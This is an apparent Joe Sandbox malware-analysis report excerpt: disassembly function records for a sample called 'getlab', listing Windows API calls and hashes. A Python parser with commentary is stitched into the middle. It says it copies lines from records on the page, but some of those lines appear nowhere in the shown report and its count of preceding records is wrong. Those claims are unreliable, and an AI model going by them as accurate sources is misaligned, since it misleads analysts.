                                                                          • Instruction Fuzzy Hash: C9E092A1741720EAEE10B7BA7D86FAA2558EB5072DF540037F100A51E1C7BD1C80CE9E
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F081), ref: 0044C7E3
                                                                          • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7F4
                                                                          • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C804
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                          • API String ID: 2238633743-1050967733
                                                                          • Opcode ID: 20d4d3efedc32434c77936c95fe9c73e42e1c540f2b792c07eccd7c7435f7152
                                                                          • Instruction ID: ee0778b55076bf214b63aaf44073c79067fceb62e20c2f516a440ec7c4faf5ed
                                                                          • Opcode Fuzzy Hash: 20d4d3efedc32434c77936c95fe9c73e42e1c540f2b792c07eccd7c7435f7152
                                                                          • Instruction Fuzzy Hash: 2FF0FE70242302CAF750ABB5FDD97563694E7E471AF14237BE401551A1D7BD4444CB8C
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                                          • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                                          • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                          • API String ID: 667068680-222143506
                                                                          • Opcode ID: 037c1e48967f880c8f75eb608e42e3021eac6f548ba3101ad95a3bedc305e175
                                                                          • Instruction ID: 2026d18a05cb2035c6a6e54b58e3f317de058d113ce64fa581f90165bcddcee3
                                                                          • Opcode Fuzzy Hash: 037c1e48967f880c8f75eb608e42e3021eac6f548ba3101ad95a3bedc305e175
                                                                          • Instruction Fuzzy Hash: F5C0E9F06C1701EA9640B7F15CDAD7A2558D520729720943F755EA6192D9BC4C104A6C
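The three records above share one shape: a module handle is obtained with GetModuleHandleA or LoadLibraryA and GetProcAddress is then called with a literal export name (ChangeWindowMessageFilterEx, LresultFromObject, CreateStdAccessibleObject, VerSetConditionMask, VerifyVersionInfoW), while other records show call targets the report could only print as raw addresses (73A1A570.USER32). The following Python is an added example for reading these API lists; it is not part of the Joe Sandbox report or of its tooling. The sample lines are copied (argument lists shortened) from the records on this page. Two things the report does not state are treated as assumptions and marked as such in the code: that the first printed slot of GetModuleHandle*/LoadLibrary* and the second printed slot of GetProcAddress are the real lpModuleName/lpProcName parameters (the remaining slots are stack residue, which is why the report prints up to sixteen of them), and that a hex "name" such as 73A1A570 means the report had no symbol for that target.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function record and summarise
how the sample resolves imports at run time.

Added example for reading records such as the ones on this page; it is not
part of the Joe Sandbox report.  Sample lines are copied from the report's
own API lists.  Assumptions the report does not state are marked below.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Joe Sandbox prints one call per bullet as  NAME.MODULE(args), ref: ADDR
# and drops the parentheses and the comma when no arguments were captured
# (compare 'GetFocus.USER32 ref: 0041B73D' on this page).  Calls reached
# through a callee are prefixed with 'Part of subcall function XXXXXXXX:'.
API_LINE = re.compile(
    r"^\s*(?:•\s*)+"
    r"(?:Part of subcall function (?P<subcall>[0-9A-F]{8}): )?"
    r"(?P<name>[0-9A-Za-z_@]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX32 = re.compile(r"^[0-9A-F]{8}$")
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")

# Constructed sample: lines copied (argument lists shortened) from three
# records on this page.
SAMPLE = """\
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934), ref: 0042EA2D
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA33
  • Part of subcall function 0042E9A4: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68), ref: 0042E9BA
• ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000), ref: 0042EA58
• LoadLibraryA.KERNEL32(oleacc.dll,?,0044F081), ref: 0044C7E3
• GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7F4
• GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C804
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
• GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
• GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
• GetFocus.USER32 ref: 0041B73D
• 73A1A570.USER32(?), ref: 0041B749
• 73A18830.GDI32(00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B77E
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall: str | None = None

    @property
    def unresolved(self) -> bool:
        # Assumption: when the report has no symbol for a call target it
        # prints the raw address in place of the name ('73A1A570.USER32').
        return HEX32.match(self.name) is not None


def parse_api_lines(text: str) -> list[ApiCall]:
    """Return every call bullet in text; headers such as 'APIs' are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = raw.split(",") if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             m.group("ref"), m.group("subcall")))
    return calls


def looks_like_export(token: str) -> bool:
    """Heuristic: an export name is a C identifier.  '?' placeholders, hex
    stack values and module file names ('user32.dll', has a dot) fail it."""
    return IDENT.match(token) is not None and HEX32.match(token) is None


def runtime_resolutions(calls: list[ApiCall]) -> list[tuple[str | None, str | None, str]]:
    """Pair each GetProcAddress with the most recent module lookup.

    Assumption: slot 1 of GetModuleHandle*/LoadLibrary* is the module name
    and slot 2 of GetProcAddress is lpProcName; later slots are stack
    residue and are ignored.  The export is None when slot 2 is not an
    identifier, i.e. the name cannot be recovered from the trace.
    """
    loaders = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}
    current_module = None
    out = []
    for c in calls:
        if c.name in loaders and c.args:
            current_module = c.args[0]
        elif c.name == "GetProcAddress":
            export = c.args[1] if len(c.args) > 1 and looks_like_export(c.args[1]) else None
            out.append((current_module, export, c.ref))
    return out


def unresolved_calls(calls: list[ApiCall]) -> list[str]:
    """'MODULE!ADDRESS' for each call the report could not name."""
    return [f"{c.module}!{c.name}" for c in calls if c.unresolved]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for module, export, ref in runtime_resolutions(parsed):
        print(f"{ref}: {module} -> {export or '<name not in trace>'}")
    print("unresolved targets:", unresolved_calls(parsed))
```

Run against the sample, the first GetProcAddress (ref 0042EA33) yields no export name: the slot printed there is `user32.dll`, not an identifier, so the parser reports that the trace does not carry the name rather than guessing one. The remaining four resolutions come out as oleacc.dll and kernel32.dll exports, and the two hex-named USER32/GDI32 targets are listed separately as calls the report could not attribute to a symbol.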
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041B73D
                                                                          • 73A1A570.USER32(?), ref: 0041B749
                                                                          • 73A18830.GDI32(00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B77E
                                                                          • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B78A
                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7B8
                                                                          • 73A18830.GDI32(00000000,00000000,00000000,0041B7F9,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A18830$A122A26310A570Focus
                                                                          • String ID:
                                                                          • API String ID: 3906783838-0
                                                                          • Opcode ID: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                                          • Instruction ID: 1a6b37f464f6ee1ac690d44aa7d10d16b676852f44f67843991ec4a9ec0a7b01
                                                                          • Opcode Fuzzy Hash: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                                          • Instruction Fuzzy Hash: D9512070A002099FCF11DFA9C891AEEBBF8EF49704F10446AF514A7790D7799981CBA9
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041BA0F
                                                                          • 73A1A570.USER32(?), ref: 0041BA1B
                                                                          • 73A18830.GDI32(00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA55
                                                                          • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA61
                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BA85
                                                                          • 73A18830.GDI32(00000000,00000000,00000000,0041BAC6,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BAB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A18830$A122A26310A570Focus
                                                                          • String ID:
                                                                          • API String ID: 3906783838-0
                                                                          • Opcode ID: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                                          • Instruction ID: 148f6e74122d55113d3717465da8055643ee1b9490db959cdfcac8ccc7d3b8de
                                                                          • Opcode Fuzzy Hash: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                                          • Instruction Fuzzy Hash: FC513975A002089FDB11DFA9C881AAEBBF9FF49700F114466F904EB750D738AD40CBA8
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041B576
                                                                          • 73A1A570.USER32(?,00000000,0041B650,?,?,?,?), ref: 0041B582
                                                                          • 73A24620.GDI32(?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B59E
                                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B5BB
                                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650), ref: 0041B5D2
                                                                          • 73A1A480.USER32(?,?,0041B62B,?,?), ref: 0041B61E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: E680$A24620A480A570Focus
                                                                          • String ID:
                                                                          • API String ID: 3709697839-0
                                                                          • Opcode ID: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                                          • Instruction ID: df8759ecd31a85a201270414174f0a8fa00d18147156f7fa6755a0b35bba35d1
                                                                          • Opcode Fuzzy Hash: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                                          • Instruction Fuzzy Hash: E9410831A00258AFCB10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D50CBA5
                                                                          APIs
                                                                          • SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                                          • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045CFA4,?,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CF16
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                          • API String ID: 1452528299-1580325520
                                                                          • Opcode ID: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                                          • Instruction ID: 04ddcdc8736abbc18e914b4e1455ed0448250d7d0c77fa2ba5441d80ccfd4ce1
                                                                          • Opcode Fuzzy Hash: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                                          • Instruction Fuzzy Hash: C7118736204304FFDB11DA91C9C2AAEB69EDB44746F6040776D00967C3D67C9F0AE56D
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BDCD
                                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BDD7
                                                                          • 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDE1
                                                                          • 73A24620.GDI32(00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE08
                                                                          • 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE15
                                                                          • 73A1A480.USER32(00000000,00000000,0041BE5B,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE4E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A24620MetricsSystem$A480A570
                                                                          • String ID:
                                                                          • API String ID: 4042297458-0
                                                                          • Opcode ID: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                                          • Instruction ID: 747e2eb1a3f7a7c841cace1b59abe43854f3131f67fff351bf4eed9cd228abed
                                                                          • Opcode Fuzzy Hash: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                                          • Instruction Fuzzy Hash: 98215974E00748AFEB10EFA9C942BEEBBB4EB48714F10842AF514B7280D7785D40CB69
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047DDAE
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CB69), ref: 0047DDD4
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047DDE4
                                                                          • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047DE05
                                                                          • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047DE19
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047DE35
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$Show
                                                                          • String ID:
                                                                          • API String ID: 3609083571-0
                                                                          • Opcode ID: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                                          • Instruction ID: 8d1f2698ea79badf96abf755c5a3f857121e06e6ffc739f26560ae4cefe558a1
                                                                          • Opcode Fuzzy Hash: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                                          • Instruction Fuzzy Hash: CA0112B5651610ABE700D768DE45F7637E8AF1C324F094266B659DF3E3C738E8408B49
                                                                          APIs
                                                                            • Part of subcall function 0041A6D8: CreateBrushIndirect.GDI32 ref: 0041A743
                                                                          • UnrealizeObject.GDI32(00000000), ref: 0041B274
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B286
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2A9
                                                                          • SetBkMode.GDI32(?,00000002), ref: 0041B2B4
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2CF
                                                                          • SetBkMode.GDI32(?,00000001), ref: 0041B2DA
                                                                            • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                          • String ID:
                                                                          • API String ID: 3527656728-0
                                                                          • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                          • Instruction ID: 416fc8ddf3b290ca22d08e3f0d0fa9d59de125dbf6d826fc2ec32e7be4b681d8
                                                                          • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                          • Instruction Fuzzy Hash: 15F072B56015009FDF00FFAAD9C6E5F67989F043197048456B948DF197C93DD8505B3A
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFileHandle
                                                                          • String ID: -cI$.tmp$_iu
                                                                          • API String ID: 3498533004-3964432171
                                                                          • Opcode ID: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                                          • Instruction ID: 987f34639f2954820d3a171204f3ba7a53f2c28fb23a6faa943e541cb6d42ed5
                                                                          • Opcode Fuzzy Hash: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                                          • Instruction Fuzzy Hash: 293195B0A00249ABCB11EFA5C942BAEBBB4AF44309F60456AF800B73C2D6785F059758
                                                                          APIs
                                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                          • ShowWindow.USER32(?,00000005,00000000,004974CD,?,?,00000000), ref: 0049729E
                                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                            • Part of subcall function 00407298: SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                                            • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                          • String ID: .dat$.msg$IMsg$Uninstall
                                                                          • API String ID: 3312786188-1660910688
                                                                          • Opcode ID: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
                                                                          • Instruction ID: 502499af6c4fed57a8803849289841afdffa1b87ef326e8d9c35a034d288349d
                                                                          • Opcode Fuzzy Hash: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
                                                                          • Instruction Fuzzy Hash: 20317574A10214AFCB01EF65DC92D5E7BB5FB88318B51847AF800AB792D739BD05CB58
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAD2
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAD8
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB01
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                          • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                          • API String ID: 828529508-2866557904
                                                                          • Opcode ID: f0f9c1c29cdcfbee2e7a8f4e336c776c41a61f3b4eee9e965eb88e8c498f29e0
                                                                          • Instruction ID: 08d6e73c43f4c72d4bf81f88f5f107f4332e42bd1359b104b354d246f0006fb7
                                                                          • Opcode Fuzzy Hash: f0f9c1c29cdcfbee2e7a8f4e336c776c41a61f3b4eee9e965eb88e8c498f29e0
                                                                          • Instruction Fuzzy Hash: 14F0F6D034062237E620B6BFAC82F7B59CC8F9472AF140036F109EB2C2E96C9905427F
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                          • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021B7B44,000012B0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                          Strings
                                                                          Memory Dump Source
